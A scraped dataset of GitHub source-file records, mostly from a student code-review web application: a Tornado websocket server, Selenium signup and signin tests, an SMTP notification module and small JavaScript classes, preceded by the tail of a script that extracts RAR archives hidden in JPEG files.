2:])\n w.close()\n \n# Let's go. In and out. Twenty minute adventure \ndef main():\n file, stack = parse_args()\n i = 0\n s = 0\n stack.reverse()\n while s <= len(stack):\n file_type = stack.pop()\n type_photo(file[s])\n print('[*] all metadata have been printed')\n if is_rarjpeg(file[s]):\n print('[*] found rarjpeg!')\n get_rarjpeg(file[s])\n print('[+] done writing rarjpeg-dump. filename: ' + file[s] + '.cellar_door')\n else:\n print('[*] rarjpeg not found!')\n s = s + 1\n if s == len(file):\n break\n print('DONE')\n exit(0)\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
Davidnln13/WORK-GS | https://github.com/Davidnln13/WORK-GS | 4dcf285a8ef7eb7ee47eae35aa18295a9281ec11 | 2aab008c840ed7afedbef9f9e18ec901b0755b84 | 9d2e1b0532cd61bea3deff58eaccaec80cad86e5 | refs/heads/master | 2020-03-18T19:57:21.964845 | 2018-06-19T13:51:53 | 2018-06-19T13:51:53 | 135,187,522 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5865272879600525,
"alphanum_fraction": 0.5981416702270508,
"avg_line_length": 18.56818199157715,
"blob_id": "1612c4f81d9b2d805dd18fa6b18e952234220898",
"content_id": "74be45496a56a8b7f12b9a38596f7cc5fd12cfba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 44,
"path": "/tests/test_signup.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..\\py')\n#sys.path.insert(0, '/C:/Users/C00178537/Desktop/Desktop/Paid Projects/Project Organiser/py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignup(unittest.TestCase):\n \"\"\"Test for Signup.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n\n def test_signup(self):\n \"\"\".\"\"\"\n print(\"test_signup\")\n self.assertTrue(is_prime(5))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6792529225349426,
"alphanum_fraction": 0.6864257454872131,
"avg_line_length": 25.483871459960938,
"blob_id": "f9b440e4bb1b831e9dd9cb0d8811aed8dd7291c8",
"content_id": "458631ea00a2b7d35c7f692e96ca0992f58d8c9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7389,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 279,
"path": "/py/server.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import tornado\nimport json\n\nfrom user_manager import UserManager\nfrom assignments_manager import AssignmentsManager\nimport planner\n\n\nfrom tornado import websocket, web, ioloop, httpserver\nfrom tornado import autoreload\nfrom tornado.ioloop import PeriodicCallback\n\n#A dictionary, key = ip:port, value = websocket associated with the ip\n#(techincally the websockethandler associated with the ip, but it's easier\n#to imagine as just the websocket.)\nconnections={}\n\ndef globalDaemonMethod():\n\tupdate_clients = planner.update()\n\t#print (\"Okay - Do we update =\", update_clients)\n\tif update_clients == True:\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\t#This can be used to restrict which ip addresses can connect to the server\n\t#return True means any machine can connect\n\tdef check_origin(self, origin):\n\t\treturn True\n\n\tdef open(self):\n\t\tpass\n\t\tprint (\"WebSocket opened\")\n\n\n\tdef on_message(self, message):\n\t\t#convert message into a dictionary\n\t\tmessage = json.loads(message)\n\t\tmessage_type = message[\"type\"]\n\t\tmessage_data = message[\"data\"]\n\n\t\tif message_type == \"signup\":\n\t\t\tself.signup(message_data)\n\n\t\telif message_type == \"signin\":\n\t\t\tprint(\"in server.py\")\n\t\t\tself.signin(message_data)\n\n\t\telif message_type == \"add_assignment\":\n\t\t\tself.add_assignment(message_data)\n\n\t\telif message_type == \"get_assignments\":\n\t\t\tself.get_assignments()\n\n\t\telif message_type == \"delete_assignment\":\n\t\t\tself.delete_assignment(message_data[\"id\"])\n\n\t\telif message_type == \"submit_assignment\":\n\t\t\tself.submit_assignment(message_data)\n\n\t\telif message_type == \"get_submissions\":\n\t\t\tself.get_submissions(message_data[\"user_id\"])\n\n\t\telif message_type == \"get_all_submissions\":\n\t\t\tself.get_all_submissions()\n\n\t\telif message_type == \"submit_review\":\n\t\t\tself.submit_review(message_data)\n\n\t\telif message_type == \"push_standard\":\n\t\t\tself.push_standard(message_data)\n\n\t\telif message_type == \"get_standard\":\n\t\t\tself.get_standard()\n\n\t\telif message_type == \"update_table\":\n\t\t\tself.update_table(message_data)\n\n\n\n\tdef signup(self, message_data):\n\t\tmessage= user_manager.signup(message_data)\n\t\tself.send_message(message[0], message[1])\n\n\t\tif message[0] ==\"signup_successful\":\n\t\t\t#Save connection in there.\n\t\t\tip_address = \"\"\n\n\t\t\t# Get IP and Port from connection context if possible\n\t\t\taddress = self.request.connection.context.address\n\t\t\tif address:\n\t\t\t\tip = address[0]\n\t\t\t\tport = str(address[1])\n\t\t\t\tip_address = ip + \":\" + port\n\n\t\t\t# Original method\n\t\t\telse:\n\t\t\t\tip = self.request.remote_ip\n\t\t\t\tport = self.request.stream.socket.getpeername()[1]\n\t\t\t\tip_address = ip + \":\" + str(port)\n\n\t\t\tprint(\"signup successful\", ip_address)\n\t\t\tmessage[1][\"users\"] = {}\n\n\t\t\tconnection = {}\n\t\t\tconnection[\"ip\"] = ip_address\n\t\t\tconnection[\"socket\"] = self\n\t\t\tconnection[\"user_data\"] = message[1]\n\n\t\t\tconnections[message[1][\"email\"]] = \tconnection\n\n\t\t\tprint(\"Connections\", connections)\n\n\tdef update_table(self, message_data):\n\t\tmessage= user_manager.update_table(message_data)\n\t\tself.send_message(message[0], message[1]) \n\n\n\tdef signin(self, message_data):\n\t\tmessage = user_manager.signin(message_data)\n\t\tself.send_message(message[0], message[1])\n\n\t\tif message[0] ==\"signin_successful\":\n\t\t\t#Save connection in there.\n\t\t\tip_address = \"\"\n\n\t\t\t# Get IP and Port from connection context if possible\n\t\t\taddress = self.request.connection.context.address\n\t\t\tif address:\n\t\t\t\tip = address[0]\n\t\t\t\tport = str(address[1])\n\t\t\t\tip_address = ip + \":\" + port\n\n\t\t\t# Original method\n\t\t\telse:\n\t\t\t\tip = self.request.remote_ip\n\t\t\t\tport = self.request.stream.socket.getpeername()[1]\n\t\t\t\tip_address = ip + \":\" + str(port)\n\n\t\t\tmessage[1][\"users\"] = {}\n\n\t\t\tconnection = {}\n\t\t\tconnection[\"ip\"] = ip_address\n\t\t\tconnection[\"socket\"] = self\n\t\t\tconnection[\"user_data\"] = message[1]\n\n\t\t\tconnections[message[1][\"email\"]] = \tconnection\n\n\t\t\tprint(\"Connections\", connections)\n\n\tdef add_assignment(self, message_data):\n\t\tmessage = assignments_manager.add_assignment(message_data)\n\t\tself.send_message(message[0],{})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\tdef delete_assignment(self, id):\n\t\tmessage = assignments_manager.delete_assignment(id)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\tdef get_assignments(self):\n\t\tmessage = assignments_manager.get_assignments()\n\t\tself.send_message(message[0], message[1])\n\n\n\tdef submit_assignment(self, message_data):\n\t\tmessage = assignments_manager.submit_assignment(message_data)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\n\tdef get_submissions(self, user_id):\n\t\tmessage = assignments_manager.get_submissions(user_id)\n\t\tself.send_message(message[0], message[1])\n\n\tdef get_all_submissions(self):\n\t\tmessage = assignments_manager.get_all_submissions()\n\t\tself.send_message(message[0], message[1])\n\n\tdef submit_review(self, message_data):\n\t\tmessage = assignments_manager.submit_review(message_data)\n\t\tself.send_message(message[0], {})\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\tdef push_standard(self, message_data):\n\t\tmessage = assignments_manager.push_standard(message_data)\n\t\tself.send_message(message[0], message[1])\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_standard()\n\n\n\tdef get_standard(self):\n\t\tmessage = assignments_manager.get_standard()\n\t\tself.send_message(message[0], message[1])\n\n\tdef on_close(self):\n\t\tprint (\"WebSocket closed\")\n\t\t#Remove connection\n\t\tkey = \"\"\n\t\ttry:\n\t\t\tfor k, item in connections.items():\n\t\t\t\tif item[\"socket\"] == self:\n\t\t\t\t\tkey = k\n\t\t\tconnections.pop(key)\n\t\texcept:\n\t\t\tprint(\"Key Error\")\n\t\tprint(\"Total Connections: \", len(connections))\n\n\n\n\tdef send_message(self,type,data):\n\t\tprint(\"send_message\")\n\t\tmsg=dict()\n\t\tmsg[\"type\"]=type\n\t\tmsg[\"data\"]=data\n\t\tmsg=json.dumps(msg)\n\t\tself.write_message(msg)\n\n\nuser_manager = UserManager()\nassignments_manager = AssignmentsManager()\n\nsettings = {\n\t'debug':True\t#includes autoreload\n}\n\napp= tornado.web.Application([\n\t#map the handler to the URI named \"wstest\"\n\t(r'/GCodeReviewer', WSHandler),\n], settings)\n\nif __name__ == '__main__':\n\tserver_port = 443 #replace with 8080 when putting on gamecore\n\tprint(\"server ON\")\n\tapp.listen(server_port)\n\tioloop = tornado.ioloop.IOLoop.instance()\n\n\t# runs a periodic update method to handle time based features.\n\t# go to daemon_update file to add/change the logic\n\t# set it to run 300000 for one run each 5 min or so.\n\tPeriodicCallback(globalDaemonMethod, 15000).start()\n\n\n\n\n\n\n\n\tautoreload.start(ioloop)\n\tioloop.start()\n"
},
{
"alpha_fraction": 0.6580086350440979,
"alphanum_fraction": 0.6634768843650818,
"avg_line_length": 35.57500076293945,
"blob_id": "5e0a61602b40d1fc0126023e5776f38fd40ee345",
"content_id": "e71b658bbb8b3afb3e4b73c8f8ea320aab506e9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4389,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 120,
"path": "/tests/testbot.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\nclass TestBot(unittest.TestCase):\n \"\"\"Test bot to run through all of the features\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n cls.name = \"Libor\"\n cls.surname = \"Zachoval\"\n cls.role = \"Admin\"\n cls.email = \"[email protected]\"\n cls.password = \"password\"\n\n cls.driver = webdriver.Chrome()\n cls.driver.get(\"http://localhost/ProjectOrganiser/\")\n cls.driver.maximize_window()\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n cls.driver.quit()\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n def test_a_signup(self):\n print(\"test_signup\")\n driver = self.driver\n\n SIGNIN_BOX_ID = \"signin-box\"\n SIGNUP_BOX_ID = \"signup-box\"\n SIGNUP_LINK_ID = \"signup-link\"\n\n SIGNUP_NAME_ID = \"signup-name\"\n SIGNUP_SURNAME_ID = \"signup-surname\"\n SIGNUP_ROLE_ID = \"signup-role\"\n SIGNUP_EMAIL_ID = \"signup-email\"\n SIGNUP_PASSWORD_ID = \"signup-password\"\n SIGNUP_BUTTON_ID = \"signup-button\"\n\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n driver.find_element_by_id(SIGNUP_LINK_ID).click()\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNUP_BOX_ID))\n self.assertEqual(SIGNUP_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n signupNameElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_NAME_ID))\n signupSurnameElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_SURNAME_ID))\n #find_element_by_xpath(\"//select[@id='\" + SIGNUP_ROLE_ID + \"']/option[text()='\"self.role\"']\").click()\n signupRoleElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_ROLE_ID))\n signupEmailElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_EMAIL_ID))\n signupPasswordElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNUP_PASSWORD_ID))\n\n signupNameElement.send_keys(self.name)\n signupSurnameElement.send_keys(self.surname)\n signupRoleElement.send_keys(self.role)\n signupEmailElement.send_keys(self.email)\n signupPasswordElement.send_keys(self.password)\n\n driver.find_element_by_id(SIGNUP_BUTTON_ID).click()\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n def test_b_signin(self):\n print(\"test_signin\")\n driver = self.driver\n\n SIGNIN_BOX_ID = \"signin-box\"\n MARK_LAB_ID = \"marklab\"\n SIGNIN_EMAIL_ID = \"signin-email\"\n SIGNIN_PASSWORD_ID = \"signin-password\"\n SIGNIN_BUTTON_ID = \"signin-button\"\n\n\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_class_name(SIGNIN_BOX_ID))\n self.assertEqual(SIGNIN_BOX_ID, boxElement.get_attribute(\"class\"))\n\n\n signinEmailElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNIN_EMAIL_ID))\n signinPasswordElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(SIGNIN_PASSWORD_ID))\n\n signinEmailElement.clear()\n signinPasswordElement.clear()\n\n signinEmailElement.send_keys(self.email)\n signinPasswordElement.send_keys(self.password)\n\n driver.find_element_by_id(SIGNIN_BUTTON_ID).click()\n\n #Needs to be updated once marklab changes\n boxElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(MARK_LAB_ID))\n self.assertEqual(MARK_LAB_ID, boxElement.get_attribute(\"id\"))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6871914863586426,
"alphanum_fraction": 0.6890101432800293,
"avg_line_length": 34.155250549316406,
"blob_id": "fe9b954c5be5bad8dbcb6ec44c44b8e7fdf53910",
"content_id": "c6ef5160b433e9be6ea6937ab2d500a1a1c891bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7698,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 219,
"path": "/py/email_system.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom email.message import EmailMessage\n\n\n\nclass EmailSystem:\n\tSYSTEM_LINK = \"http://gamecore.itcarlow.ie/CodeReviewer2/\"\n\n\n\n\tdef __init__(self):\n\t\tprint(\"EmailSystem: __init__\")\n\t\tself.email_server = 'akmac.itcarlow.ie'\n\t\tself.EMAIL_ADDRESS = '[email protected]'\n\n\n\t\tself.letter_near_deadline = \"Hello {0}.<br><br> The deadline for the {1} is at {2} {3}. Please submit your work. \" \\\n\t\t\t\t\t\t\t\t\t\"<br><br>Have a good day<br>Spaceship Assembly Message System\"\n\n\n\n\t\tself.letter_review = \"Hi there {0}.<br><br>\" \\\n\t\t\t\t\t\t\t \"The deadline was successfully completed. Visit the \\\"Reviews To Do\\\" tab and see the submissions you need to review for this assignment. Periodically check the \\\"Feedbacks\\\" tab to see work reviewed.<br><br>\" \\\n\t\t\t\t\t\t\t \"If you want to resubmit work, you can do it in your \\\"Assignments\\\" tab, but there is a limit up to which time you can do it - once it reached you cannot do any reviews.<br><br>\" \\\n\t\t\t\t\t\t\t \"Good luck<br>Spaceship Assembly Message System\"\n\n\n\n\t\tself.letter_re_submission = \"Greetings {0}.<br><br> One of the users whose work you reviewed has submitted a new version of the submission - go take a look at it and fix it if needed.<br><br> Regards<br>Spaceship Assembly Message System\"\n\n\t\tself.letter_near_review_deadline = \"Hello {0}.<br><br> The deadline for reviewing is coming. Please complete your reviews if you haven't yet<br><br>Good luck<br>Spaceship Assembly Message System\"\n\n\t\tself.letter_welcome = \t\"Welcome, {0}. You were invited into the Spaceship Assembly Sector as a programmer! Here is the ticket to our place: <a href='{1}'>Ticket</a><br><br>Regards<br>Spaceship Assembly Message System\"\n\n\n\n\n\n\n\tdef send_welcome_emails(self, org, students):\n\t\trepo_url_part = \"https://github.com/\" + org + \"/\"\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = \"Welcome to the system\"\n\t\t\tfull_repo_path = repo_url_part + student[\"team_repo\"] + \"/\"\n\n\t\t\tcontent = \tself.letter_welcome.format(student[\"full_name\"], full_repo_path)\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_new_deadline_emails(self, students, deadline):\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = \"There is a new deadline!\"\n\t\t\tdeadline_datetime = deadline[\"datetime\"].split(\"T\")\n\n\t\t\tcontent = \tself.letter_new_deadline.format(deadline[\"name\"], deadline_datetime[0], deadline_datetime[1], self.CODE_REVIEW_URL, student[\"full_name\"])\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_welcome_emails' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\n\tdef send_near_deadline_emails(self, students, deadline):\n\t\tdatetime = deadline[\"date_time\"].split(\"T\")\n\t\tfor student in students:\n\t\t\tmsg = MIMEMultipart()\n\t\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\t\tmsg['To'] = student[\"email\"]\n\t\t\tmsg['Subject'] = deadline[\"name\"] + \"'s deadline is within an hour!\"\n\n\t\t\tcontent = \tself.letter_near_deadline.format(student[\"full_name\"], deadline[\"name\"], datetime[0], datetime[1])\n\t\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\t\ttry:\n\t\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\t\ts.quit()\n\t\t\texcept IOError:\n\t\t\t\tprint(\"Error sending 'send_near_deadline_emails' email: Unable to send to \" + student[\"email\"])\n\t\t\texcept smtplib.SMTPConnectError:\n\t\t\t\tprint(\"Error sending 'send_near_deadline_emails' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_submission_message(self, student):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"You successfully submitted your work.\"\n\t\tcontent = self.letter_submission.format(student[\"full_name\"])\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\tdef send_review_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Deadline is completed!\"\n\n\t\tcontent = \tself.letter_review.format(student[\"full_name\"],pull_url,self.CODE_REVIEW_URL, self.CPP_STANDARDS)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\tdef send_review_passed_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Your Pull Request is good to merge!\"\n\t\tcontent = \tself.letter_passed.format(student[\"full_name\"], pull_url)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\n\n\n\n\tdef send_review_redo_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Your Repo was reviewed. Solve issues.\"\n\t\tcontent = self.letter_redo.format( student[\"full_name\"], pull_url)\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\tdef send_review_corrected_email(self, student, pull_url):\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = self.EMAIL_ADDRESS\n\t\tmsg['To'] = student[\"email\"]\n\t\tmsg['Subject'] = \"Pull Request you reviewed was corrected\"\n\n\t\tcontent = self.letter_corrected.format(pull_url, student[\"full_name\"])\n\n\t\tmsg.attach(MIMEText(content, 'html'))\n\n\t\ttry:\n\t\t\ts = smtplib.SMTP(self.email_server)\n\t\t\ts.sendmail(self.EMAIL_ADDRESS, student[\"email\"], msg.as_string())\n\t\t\ts.quit()\n\n\t\texcept IOError:\n\t\t\tprint(\"Error sending 'send_submission' email: Unable to send to \" + student[\"email\"])\n\t\texcept smtplib.SMTPConnectError:\n\t\t\tprint(\"Error sending 'send_submission' email: smtp exception \" + student[\"email\"])\n\n\n\n\tdef __del__(self, *err):\n\t\tprint (\"EmailSystem:__del__\")"
},
{
"alpha_fraction": 0.6577181220054626,
"alphanum_fraction": 0.6577181220054626,
"avg_line_length": 10.037036895751953,
"blob_id": "ed6fa3cd651950a0f207bda51cf08da2e235fba7",
"content_id": "0b7a8778a19fbe72d9c1473931fcdd7357103a7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 27,
"path": "/views/profile/ProfileView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass ProfileView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.PROFILE;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\n\t}\n\n\n\tshow()\n\t{\n\n\n\n\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.5904762148857117,
"alphanum_fraction": 0.5904762148857117,
"avg_line_length": 20,
"blob_id": "b164c9a6135d1991c612d428654edeb7e7c5a2b2",
"content_id": "256265bef84a60fbd040cc86e27c0acd49e8740c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 10,
"path": "/js/Standard.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Standard\n{\n constructor(data)\n {\n this.id = data.id;\n this.category = data.category;\n this.subCategory = data.sub_category;\n this.description = data.description;\n }\n}\n"
},
{
"alpha_fraction": 0.5583333373069763,
"alphanum_fraction": 0.7416666746139526,
"avg_line_length": 16.285715103149414,
"blob_id": "111d2101a41aa469445502f1f543da220daa0f62",
"content_id": "c47cd6de90d41f99760807c793ddfa00d1fba7b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 7,
"path": "/Docker/requirements.txt",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "tornado==4.4.2\nrequests==2.18.4\nmysql-connector==2.1.6\nselenium==3.7.0\nunittest2py3k==0.5.1\npytest==3.2.5\nbeautifulsoup4"
},
{
"alpha_fraction": 0.5801470875740051,
"alphanum_fraction": 0.583088219165802,
"avg_line_length": 25.153846740722656,
"blob_id": "9f1c4ccb500f54e336f831f521c16ebac446f87a",
"content_id": "ca9dabc5225556d8884094ceb375790c80ef0804",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 52,
"path": "/js/Listened.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Listened\n{\n constructor()\n {\n\n }\n setUpListening()\n {\n //list of children of the body\n var docBodyChildren = document.getElementsByTagName(\"body\")[0].children;\n console.log(docBodyChildren);\n\n this.recursiveCheck(docBodyChildren);\n\n }\n\n recursiveCheck(docBodyIn)\n {\n //for every element in the body\n for (var i=0; i<docBodyIn.length; i++)\n {\n //if it has at least 1 child\n if(docBodyIn[i].children.length > 0)\n {\n //recursively pass in that child to this method\n //check if it has children\n this.recursiveCheck(docBodyIn[i].children);\n //console.log(\"going to child of\", docBodyIn[i].id);\n }\n else\n {\n try\n {\n //if the element has no children try add an addEventListener to it which will only work if it has an id which is what we want\n // elementsToTrack.push(docBodyIn[i].id);\n if(docBodyIn[i].id !== null)\n {\n document.getElementById(docBodyIn[i].id).addEventListener(\"click\", function(){track(this.id)} );\n console.log(\"adding tracker to \", docBodyIn[i].id);\n }\n }\n catch (e)\n {\n //if it doesnt have an id it doesnt need to be tracked\n //console.log(\"element doesnt have an id so doesnt need to be tracked\");\n }\n }\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.49871334433555603,
